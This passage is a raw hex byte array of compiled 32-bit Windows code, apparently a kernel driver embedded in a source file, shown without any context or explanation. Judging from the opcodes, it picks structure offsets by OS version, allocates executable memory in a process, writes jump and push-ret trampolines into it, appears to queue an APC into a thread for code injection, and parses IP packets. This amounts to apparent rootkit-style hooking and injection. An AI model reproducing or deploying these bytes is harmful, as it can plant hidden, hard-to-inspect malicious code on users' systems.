0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x8c,0xfc,0x02,0x00,0x00,0x6a,0x00,0x6a,0x18, 0x8d,0x55,0xc4,0x52,0x6a,0x00,0x8b,0x45,0xe0,0x50,0xff,0x15,0xd0,0x02,0x00,0x10, 0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x7d,0x16,0x8b,0x4d,0xe4,0x51,0x68,0x20,0x05, 0x00,0x10,0xe8,0x1b,0x14,0x00,0x00,0x83,0xc4,0x08,0xe9,0xbd,0x02,0x00,0x00,0x8d, 0x55,0xa8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xcc,0x02,0x00,0x10,0x8b,0x4d,0xc8, 0x8b,0x51,0x08,0x89,0x55,0xc0,0xc7,0x45,0xa4,0x00,0x00,0x00,0x00,0x8d,0x45,0xa4, 0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0x8b,0x45,0xe0,0x50,0xe8,0x7e,0xfd, 0xff,0xff,0x0f,0xb6,0xc8,0x85,0xc9,0x0f,0x84,0x75,0x02,0x00,0x00,0xc7,0x45,0xfc, 0x00,0x00,0x00,0x00,0x8b,0x55,0x10,0x8b,0x45,0xa4,0x03,0x42,0x3c,0x89,0x45,0x9c, 0x8b,0x4d,0x9c,0x8b,0x55,0xa4,0x03,0x51,0x28,0x89,0x55,0x94,0x8b,0x45,0x94,0x50, 0x68,0x54,0x05,0x00,0x10,0xe8,0xa8,0x13,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0x8c, 0x00,0x00,0x00,0x00,0x68,0x80,0x11,0x00,0x10,0xe8,0x22,0xfb,0xff,0xff,0x89,0x45, 0x98,0x8b,0x4d,0x98,0x83,0xc1,0x29,0x89,0x4d,0x90,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x8d,0x55,0x90,0x52,0x6a,0x00,0x8d,0x45,0x8c,0x50,0x8b,0x4d,0xe0,0x51,0xff, 0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xa0,0x83,0x7d,0xa0,0x00,0x0f,0x8c,0xc9,0x01, 0x00,0x00,0x8b,0x55,0x8c,0x52,0x68,0x8c,0x05,0x00,0x10,0xe8,0x52,0x13,0x00,0x00, 0x83,0xc4,0x08,0x8b,0x45,0x90,0x50,0x68,0x90,0x00,0x00,0x00,0x8b,0x4d,0x8c,0x51, 0xe8,0x49,0x13,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x8c,0xc6,0x02,0x68,0x8b,0x45, 0x8c,0x8b,0x4d,0xa4,0x89,0x48,0x01,0x8b,0x55,0x8c,0xc6,0x42,0x05,0xe8,0x8b,0x45, 0x8c,0x83,0xc0,0x29,0x8b,0x4d,0x8c,0x83,0xc1,0x06,0x2b,0xc1,0x83,0xe8,0x04,0x8b, 0x55,0x8c,0x89,0x42,0x06,0xb8,0x85,0xc0,0x00,0x00,0x8b,0x4d,0x8c,0x66,0x89,0x41, 0x0a,0xba,0x0f,0x84,0x00,0x00,0x8b,0x45,0x8c,0x66,0x89,0x50,0x0c,0x8b,0x4d,0x8c, 0x83,0xc1,0x26,0x8b,0x55,0x8c,0x83,0xc2,0x0e,0x2b,0xca,0x83,0xe9,0x04,0x8b,0x45, 0x8c,0x89,0x48,0x0e,0x8b,0x4d,0x8c,0xc6,0x41,0x12,0x68,0x8b,0x55,0x8c,0xc7,0x42, 0x13,0x00,0x00,0x00,0x00,0x8b,0x45,0x8c,0xc6,0x40,0x17,0x68,0x8b,0x4d,0x8c,0xc7, 0x41,0x18,0x01,0x00,0x00,0x00,0x8b,0x55,0x8c,0xc6,0x42,0x1c,0x68,0x8b,0x45,0x8c, 0x8b,0x4d,0xa4,0x89,0x48,0x1d,0x8b,0x55,0x8c,0xc6,0x42,0x21,0xe8,0x8b,0x45,0x8c, 0x83,0xc0,0x22,0x8b,0x4d,0x94,0x2b,0xc8,0x83,0xe9,0x04,0x8b,0x55,0x8c,0x89,0x4a, 0x22,0x8b,0x45,0x8c,0xc6,0x40,0x26,0xc2,0xb9,0x03,0x00,0x00,0x00,0x8b,0x55,0x8c, 0x66,0x89,0x4a,0x27,0x8b,0x45,0x98,0x50,0x68,0x80,0x11,0x00,0x10,0x8b,0x4d,0x8c, 0x83,0xc1,0x29,0x51,0xe8,0xa5,0x12,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x03, 0x15,0x80,0x2d,0x00,0x10,0x89,0x55,0x88,0x6a,0x00,0x6a,0x01,0x8b,0x45,0x8c,0x50, 0x6a,0x00,0x68,0xb0,0x13,0x00,0x10,0x6a,0x00,0x8b,0x4d,0x0c,0x51,0x8d,0x95,0x58, 0xff,0xff,0xff,0x52,0xff,0x15,0xc8,0x02,0x00,0x10,0x8b,0x45,0x88,0xc6,0x40,0x16, 0x01,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8d,0x58,0xff,0xff,0xff,0x51,0xff,0x15, 0xc4,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x71,0xc7,0x85,0x50,0xff,0xff, 0xff,0x80,0x69,0x67,0xff,0xc7,0x85,0x54,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x8d, 0x85,0x50,0xff,0xff,0xff,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00, 0x10,0xff,0x15,0xc0,0x02,0x00,0x10,0x89,0x45,0xa0,0x81,0x7d,0xa0,0x02,0x01,0x00, 0x00,0x75,0x0f,0x68,0xac,0x05,0x00,0x10,0xe8,0xd5,0x11,0x00,0x00,0x83,0xc4,0x04, 0xeb,0x17,0x83,0x7d,0xa0,0x00,0x7c,0x11,0x68,0xe0,0x05,0x00,0x10,0xe8,0xc0,0x11, 0x00,0x00,0x83,0xc4,0x04,0xc6,0x45,0xdf,0x01,0x8d,0x8d,0x50,0xff,0xff,0xff,0x51, 0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0xeb,0x0d,0x68,0x08,0x06,0x00, 0x10,0xe8,0x9c,0x11,0x00,0x00,0x83,0xc4,0x04,0xeb,0x11,0x8b,0x55,0xa0,0x52,0x68, 0x24,0x06,0x00,0x10,0xe8,0x89,0x11,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0xff, 0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,0x00,0xc3,0x8b,0x65,0xe8,0x68,0x58, 0x06,0x00,0x10,0xe8,0x6a,0x11,0x00,0x00,0x83,0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff, 0xff,0xff,0x8d,0x45,0xa8,0x50,0xff,0x15,0xb8,0x02,0x00,0x10,0x8b,0x4d,0xe0,0x51, 0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xe4,0x52,0x68,0x78,0x06,0x00, 0x10,0xe8,0x3c,0x11,0x00,0x00,0x83,0xc4,0x08,0x8a,0x45,0xdf,0x8b,0x4d,0xf0,0x64, 0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00, 0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51, 0x6a,0x00,0x8b,0x55,0x08,0x52,0xe8,0xf5,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d, 0xf4,0x51,0xe8,0x39,0xfc,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94, 0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55, 0x08,0x52,0x68,0xa8,0x06,0x00,0x10,0xe8,0xb6,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a, 0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00, 0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51, 0x8b,0x55,0x08,0x52,0x6a,0x00,0xe8,0x75,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d, 0xf4,0x51,0xe8,0xb9,0xfb,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94, 0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55, 0x08,0x52,0x68,0xe8,0x06,0x00,0x10,0xe8,0x36,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a, 0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0xc7,0x85,0xe0,0xfe,0xff,0xff,0x1c, 0x01,0x00,0x00,0x8d,0x85,0xe0,0xfe,0xff,0xff,0x50,0xff,0x15,0xdc,0x02,0x00,0x10, 0x85,0xc0,0x7d,0x07,0x32,0xc0,0xe9,0x0f,0x01,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff, 0xff,0x05,0x75,0x22,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x19,0xc7,0x05,0xdc, 0x2d,0x00,0x10,0x89,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x34,0x00,0x00, 0x00,0xe9,0xbf,0x00,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x05,0x75,0x39,0x83, 0xbd,0xe8,0xfe,0xff,0xff,0x02,0x75,0x30,0xc7,0x05,0xdc,0x2d,0x00,0x10,0x8f,0x00, 0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x28,0x00,0x00,0x00,0x0f,0xb7,0x4d,0xf4, 0x85,0xc9,0x75,0x12,0x0f,0xb7,0x55,0xf6,0x85,0xd2,0x75,0x0a,0xc7,0x05,0x80,0x2d, 0x00,0x10,0x34,0x00,0x00,0x00,0xeb,0x7d,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x06,0x75, 0x3b,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x32,0x0f,0xb7,0x45,0xf4,0x85,0xc0, 0x75,0x14,0x0f,0xb7,0x4d,0xf6,0x85,0xc9,0x75,0x0c,0xc7,0x05,0xdc,0x2d,0x00,0x10, 0xcf,0x00,0x00,0x00,0xeb,0x0a,0xc7,0x05,0xdc,0x2d,0x00,0x10,0xd2,0x00,0x00,0x00, 0xc7,0x05,0x80,0x2d,0x00,0x10,0x38,0x00,0x00,0x00,0xeb,0x39,0x83,0xbd,0xe4,0xfe, 0xff,0xff,0x06,0x75,0x1f,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x16,0xc7,0x05, 0xdc,0x2d,0x00,0x10,0xd7,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x40,0x00, 0x00,0x00,0xeb,0x11,0x68,0x28,0x07,0x00,0x10,0xe8,0x14,0x0f,0x00,0x00,0x83,0xc4, 0x04,0x32,0xc0,0xeb,0x25,0x8b,0x15,0xdc,0x2d,0x00,0x10,0x52,0x68,0x58,0x07,0x00, 0x10,0xe8,0xfc,0x0e,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0x6a,0x01,0x68,0xcc,0x2d, 0x00,0x10,0xff,0x15,0xd8,0x02,0x00,0x10,0xb0,0x01,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0xff,0x15,0x88,0x02,0x00,0x10,0x89,0x45,0xfc,0x81,0x7d,0xfc, 0x14,0x00,0x06,0x00,0x74,0x15,0x8b,0x45,0xfc,0x50,0x68,0x88,0x07,0x00,0x10,0xe8, 0xbe,0x0e,0x00,0x00,0x83,0xc4,0x08,0x32,0xc0,0xeb,0x5b,0x8b,0x4d,0x08,0x89,0x0d, 0xe0,0x2d,0x00,0x10,0xc7,0x05,0x88,0x2d,0x00,0x10,0x0c,0x00,0x00,0x00,0xc7,0x05, 0x8c,0x2d,0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x84,0x2d,0x00,0x10,0x24,0x00, 0x00,0x00,0xc7,0x05,0x90,0x2d,0x00,0x10,0xdc,0x00,0x00,0x00,0xc7,0x05,0x94,0x2d, 0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x98,0x2d,0x00,0x10,0xc0,0x01,0x00,0x00, 0xc7,0x05,0x9c,0x2d,0x00,0x10,0x9c,0x01,0x00,0x00,0xc7,0x05,0xa0,0x2d,0x00,0x10, 0x10,0x00,0x00,0x00,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0x00,0x2d,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xcc, 0x53,0x56,0x57,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00, 0x00,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0x08,0x8b,0x51,0x04, 0x89,0x55,0xe4,0xeb,0x08,0x8b,0x45,0xe4,0x8b,0x08,0x89,0x4d,0xe4,0x83,0x7d,0xe4, 0x00,0x0f,0x84,0xa2,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x42,0x04,0x89,0x45,0xd8, 0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b, 0x48,0x0c,0x89,0x4d,0xc0,0xeb,0x17,0x6a,0x10,0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a, 0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,0x00,0x10,0x89,0x45,0xc0,0x8b,0x45, 0xc0,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00, 0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b, 0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9, 0x35,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x45,0xd4,0x03,0x42,0x08,0x89,0x45,0xd4, 0x8b,0x4d,0xd8,0x8b,0x55,0xe4,0x8b,0x41,0x14,0x2b,0x42,0x08,0x89,0x45,0xdc,0x83, 0x7d,0xdc,0x00,0x0f,0x8e,0xbc,0x00,0x00,0x00,0x8b,0x4d,0x10,0x8b,0x11,0x03,0x55, 0xdc,0x89,0x55,0xd0,0x8b,0x45,0xd0,0x50,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10, 0x89,0x45,0xcc,0x83,0x7d,0xcc,0x00,0x74,0x59,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74, 0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,0x10,0x8b,0x08,0x51,0x8b, 0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xcc,0x51,0xe8,0x60,0x0d,0x00,0x00,0x83,0xc4, 0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,0x90,0x02,0x00,0x10,0x8b, 0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,0x4d,0xcc,0x03,0x08,0x51, 0xe8,0x39,0x0d,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xcc,0x89,0x02, 0xeb,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00, 0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10, 0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0x6d,0x01,0x00,0x00,0x8b,0x55,0x10,0x8b, 0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45,0x0c,0x8d, 0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8, 0x00,0x0f,0x84,0x3d,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2, 0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,0x48,0x0c,0x89,0x4d,0xbc,0xeb,0x17,0x6a,0x10, 0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02, 0x00,0x10,0x89,0x45,0xbc,0x8b,0x45,0xbc,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75, 0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76, 0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7, 0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0xde,0x00,0x00,0x00,0x8b,0x55,0xd8,0x8b,0x42, 0x14,0x89,0x45,0xdc,0x83,0x7d,0xdc,0x00,0x0f,0x8e,0xb9,0x00,0x00,0x00,0x8b,0x4d, 0x10,0x8b,0x11,0x03,0x55,0xdc,0x89,0x55,0xc8,0x8b,0x45,0xc8,0x50,0x6a,0x00,0xff, 0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xc4,0x83,0x7d,0xc4,0x00,0x74,0x59,0x8b,0x4d, 0x0c,0x83,0x39,0x00,0x74,0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45, 0x10,0x8b,0x08,0x51,0x8b,0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xc4,0x51,0xe8,0x1b, 0x0c,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15, 0x90,0x02,0x00,0x10,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b, 0x4d,0xc4,0x03,0x08,0x51,0xe8,0xf4,0x0b,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c, 0x8b,0x45,0xc4,0x89,0x02,0xeb,0x27,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b, 0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff, 0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xeb,0x2b,0x8b,0x55, 0x10,0x8b,0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45, 0x0c,0x8d,0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0xe9, 0xb9,0xfe,0xff,0xff,0xe9,0x4c,0xfd,0xff,0xff,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff, 0xe8,0x02,0x00,0x00,0x00,0xeb,0x01,0xc3,0x8b,0x45,0xe0,0x8b,0x4d,0xf0,0x64,0x89, 0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x6a,0x12,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x74,0x44,0x8b,0x45,0xfc,0xc6,0x00,0x58,0x8b,0x4d,0xfc, 0xc6,0x41,0x01,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x89,0x42,0x02,0x8b,0x4d,0xfc, 0xc6,0x41,0x06,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x0c,0x89,0x42,0x07,0x8b,0x4d,0xfc, 0xc6,0x41,0x0b,0x50,0x8b,0x55,0xfc,0xc6,0x42,0x0c,0x68,0x8b,0x45,0xfc,0x8b,0x4d, 0x10,0x89,0x48,0x0d,0x8b,0x55,0xfc,0xc6,0x42,0x11,0xc3,0x8b,0x45,0xfc,0x8b,0xe5, 0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x14,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00, 0x74,0x54,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00, 0x8d,0x4d,0xf4,0x51,0x8d,0x55,0xf8,0x52,0x8b,0x45,0xfc,0x50,0xe8,0x3f,0xfc,0xff, 0xff,0x85,0xc0,0x75,0x27,0x83,0x3d,0xe0,0x2d,0x00,0x10,0x00,0x74,0x12,0x8b,0x4d, 0xf4,0x51,0x8b,0x55,0xf8,0x52,0x8b,0x45,0x10,0x50,0xff,0x15,0xe0,0x2d,0x00,0x10, 0x6a,0x00,0x8b,0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0xfc,0x8b, 0x02,0x89,0x45,0xfc,0xeb,0xa6,0x8b,0x4d,0x20,0x51,0x8b,0x55,0x1c,0x52,0x8b,0x45, 0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x8b,0xe5,0x5d, 0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b, 0x08,0x89,0x4d,0xf8,0x68,0x20,0x21,0x00,0x10,0x6a,0x00,0x8b,0x55,0xf8,0x52,0xe8, 0xdc,0xfe,0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x0e,0x8b,0x45,0x08, 0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xfc,0x89,0x08,0x8b,0x55,0x1c,0x52,0x8b, 0x45,0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x83,0x7d, 0xfc,0x00,0x74,0x1a,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xf8, 0x89,0x08,0x6a,0x00,0x8b,0x55,0xfc,0x52,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0xe5, 0x5d,0xc2,0x18,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x8b,0x45,0x08,0xc1,0xe8,0x10,0x8b,0x4d,0x08,0x81,0xe1,0xff,0xff, 0x00,0x00,0x03,0xc1,0x89,0x45,0x08,0x8b,0x55,0x08,0xc1,0xea,0x10,0x03,0x55,0x08, 0x89,0x55,0x08,0x8b,0x45,0x08,0xf7,0xd0,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8b,0x45,0x10,0x89,0x45,0xfc,0x83,0x7d,0x0c,0x01,0x7e,0x20, 0x8b,0x4d,0x08,0x0f,0xb7,0x11,0x03,0x55,0xfc,0x89,0x55,0xfc,0x8b,0x45,0x0c,0x83, 0xe8,0x02,0x89,0x45,0x0c,0x8b,0x4d,0x08,0x83,0xc1,0x02,0x89,0x4d,0x08,0xeb,0xda, 0x83,0x7d,0x0c,0x00,0x7e,0x0c,0x8b,0x55,0x08,0x0f,0xb6,0x02,0x03,0x45,0xfc,0x89, 0x45,0xfc,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x6a,0x00,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x9d, 0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,0xfc,0x52,0xe8,0x61,0xff,0xff,0xff,0x8b, 0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8d,0x45,0x08,0x89,0x45,0xfc,0x8b,0x4d,0xfc,0x0f,0xb6,0x51, 0x03,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,0x8b,0x45,0xfc,0x0f,0xb6,0x48,0x02,0x81, 0xe1,0xff,0x00,0x00,0x00,0x51,0x8b,0x55,0xfc,0x0f,0xb6,0x42,0x01,0x25,0xff,0x00, 0x00,0x00,0x50,0x8b,0x4d,0xfc,0x0f,0xb6,0x11,0x81,0xe2,0xff,0x00,0x00,0x00,0x52, 0x68,0xb8,0x08,0x00,0x10,0x68,0xe4,0x2d,0x00,0x10,0xe8,0x5b,0x09,0x00,0x00,0x83, 0xc4,0x18,0xb8,0xe4,0x2d,0x00,0x10,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x3d,0x10,0x2e,0x00,0x10,0x00,0x74,0x20,0x83,0x3d,0x14,0x2e, 0x00,0x10,0x00,0x76,0x17,0xa1,0x14,0x2e,0x00,0x10,0x50,0x8b,0x0d,0x10,0x2e,0x00, 0x10,0x51,0x68,0xc8,0x08,0x00,0x10,0xe8,0x54,0xf7,0xff,0xff,0x5d,0xc2,0x04,0x00, 0x55,0x8b,0xec,0x83,0xec,0x3c,0x56,0x83,0x7d,0x10,0x22,0x73,0x05,0xe9,0x01,0x02, 0x00,0x00,0x8b,0x45,0x0c,0x89,0x45,0xec,0x8b,0x4d,0xec,0x0f,0xb7,0x51,0x0c,0x83, 0xfa,0x08,0x74,0x05,0xe9,0xea,0x01,0x00,0x00,0x8b,0x45,0xec,0x83,0xc0,0x0e,0x89, 0x45,0xe8,0x8b,0x4d,0xe8,0x8a,0x11,0xc0,0xea,0x04,0x80,0xe2,0x0f,0x0f,0xb6,0xc2, 0x83,0xf8,0x04,0x75,0x13,0x8b,0x4d,0xe8,0x8a,0x11,0x80,0xe2,0x0f,0x0f,0xb6,0xc2, 0xc1,0xe0,0x02,0x83,0xf8,0x14,0x74,0x05,0xe9,0xb6,0x01,0x00,0x00,0x8b,0x4d,0xe8, 0x0f,0xb6,0x51,0x09,0x83,0xfa,0x01,0x74,0x1c,0x8b,0x45,0xe8,0x0f,0xb6,0x48,0x09, 0x85,0xc9,0x74,0x11,0x8b,0x55,0xe8,0x0f,0xb6,0x42,0x09,0x83,0xf8,0x11,0x74,0x05, 0xe9,0x8e,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x0f,0xb7,0x51,0x02,0x81,0xe2,0xff,0x00, 0x00,0x00,0xc1,0xe2,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0x00,0xff, 0x00,0x00,0xc1,0xf9,0x08,0x8d,0x54,0x0a,0x0e,0x3b,0x55,0x10,0x76,0x05,0xe9,0x60, 0x01,0x00,0x00,0x8b,0x45,0xe8,0x66,0x8b,0x48,0x0a,0x66,0x89,0x4d,0xd0,0x33,0xd2, 0x8b,0x45,0xe8,0x66,0x89,0x50,0x0a,0x0f,0xb7,0x75,0xd0,0x6a,0x14,0x8b,0x4d,0xe8, 0x51,0xe8,0x6a,0xfe,0xff,0xff,0x0f,0xb7,0xd0,0x3b,0xf2,0x74,0x05,0xe9,0x31,0x01, 0x00,0x00,0x8b,0x45,0xe8,0x8b,0x48,0x10,0x51,0xe8,0x82,0xfe,0xff,0xff,0x50,0x8d, 0x55,0xd8,0x52,0xe8,0x34,0x08,0x00,0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x8b,0x48, 0x0c,0x51,0xe8,0x69,0xfe,0xff,0xff,0x50,0x8d,0x55,0xf0,0x52,0xe8,0x1b,0x08,0x00, 0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0xff,0x00,0x00, 